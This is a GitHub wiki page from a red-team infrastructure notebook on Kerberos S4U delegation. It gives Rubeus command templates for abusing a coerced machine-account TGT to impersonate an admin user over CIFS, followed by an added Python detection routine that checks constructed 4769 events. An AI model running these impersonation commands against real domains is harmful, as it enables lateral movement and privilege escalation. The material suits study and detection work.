Service for User (S4U) - CraigDonkin/Infrastructure GitHub Wiki
- Service for user (S4U)
  - Service for user to self (S4U2Self)
    - Allows a service to get a TGS to itself on behalf of a user
  - Service for user to proxy (S4U2Proxy)
    - Allows a service to get a TGS on behalf of a user to a different service
- If you have a TGT for a machine (`$`) account and pass the ticket into a logon session, you can't access the C$ share on the machine itself, because machines don't have remote local admin access to themselves. So use this trick if you want to access a machine remotely with its TGT.
  - For example, you coerced auth and have the TGT of a machine account from something like PetitPotam/spoolserver etc.
- Use S4U2Self with `/self` to get a TGS for a different user that has local admin to the server you're attacking

  ```
  Rubeus.exe s4u /impersonateuser:<user to impersonate> /self /altservice:cifs/<server FQDN> /user:<machine account> /ticket:<TGT of machine account> /nowrap
  ```
- Then use `createnetonly` with the TGS

  ```
  Rubeus.exe createnetonly /program:<program> /domain:<domain> /username:<username> /password:<fakepassword> /ticket:<TGS>
  ```
- If this is already being run in a sacrificial logon session, the ticket can be passed straight into that session with `/ptt`.

  ```
  Rubeus.exe s4u /impersonateuser:<user to impersonate> /self /altservice:cifs/<server FQDN> /user:<machine account> /ticket:<TGT of machine account> /nowrap /ptt
  ```
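
For detection, the S4U2Self step above reaches the KDC as a machine account requesting a ticket to itself, and when the TGT is used from another host the request's source address is not the machine's own. The following is an added example, not part of the original wiki: it applies that check to constructed Event ID 4769 records. It assumes such requests are logged with the machine account as both requester and service name; the host inventory, host names and addresses are made up.

```python
import ipaddress

# Constructed 4769 EventData records; hosts, domain and addresses are made up.
EVENTS = [
    {"TargetUserName": "SRV01$@CORP.EXAMPLE", "ServiceName": "SRV01$",
     "IpAddress": "::ffff:10.0.0.21", "Status": "0x0"},  # SRV01 itself
    {"TargetUserName": "SRV01$@CORP.EXAMPLE", "ServiceName": "SRV01$",
     "IpAddress": "::ffff:10.0.0.99", "Status": "0x0"},  # some other host
    {"TargetUserName": "alice@CORP.EXAMPLE", "ServiceName": "SRV01$",
     "IpAddress": "::ffff:10.0.0.50", "Status": "0x0"},  # ordinary user request
    {"TargetUserName": "DC01$@CORP.EXAMPLE", "ServiceName": "DC01$",
     "IpAddress": "::1", "Status": "0x0"},               # local to the KDC
]

# Assumed inventory: machine account -> addresses that host normally uses.
HOST_IPS = {"SRV01$": {"10.0.0.21"}, "DC01$": {"10.0.0.10"}}


def normalise_ip(raw):
    """Parse an IpAddress field, unwrapping IPv4-mapped IPv6; None if unusable."""
    try:
        addr = ipaddress.ip_address(raw)
    except ValueError:
        return None
    return getattr(addr, "ipv4_mapped", None) or addr


def find_remote_self_requests(events, host_ips):
    """Flag successful machine-account requests for a ticket to itself
    that arrive from an address the machine is not known to use."""
    hits = []
    for ev in events:
        account = ev["TargetUserName"].split("@")[0].upper()
        if not account.endswith("$") or account != ev["ServiceName"].upper():
            continue  # not a machine account asking for its own service
        if ev.get("Status") != "0x0":
            continue  # request failed, no ticket was issued
        src = normalise_ip(ev.get("IpAddress", ""))
        if src is None or src.is_loopback:
            continue  # no usable source address, or request made on the KDC
        expected = host_ips.get(account)
        if expected is None:
            hits.append((account, str(src), "host not in inventory"))
        elif str(src) not in expected:
            hits.append((account, str(src), "source is not the host itself"))
    return hits


if __name__ == "__main__":
    for hit in find_remote_self_requests(EVENTS, HOST_IPS):
        print(hit)
```

Services also perform S4U2Self legitimately from their own host, which is why the check keys on the source address and not on the request alone.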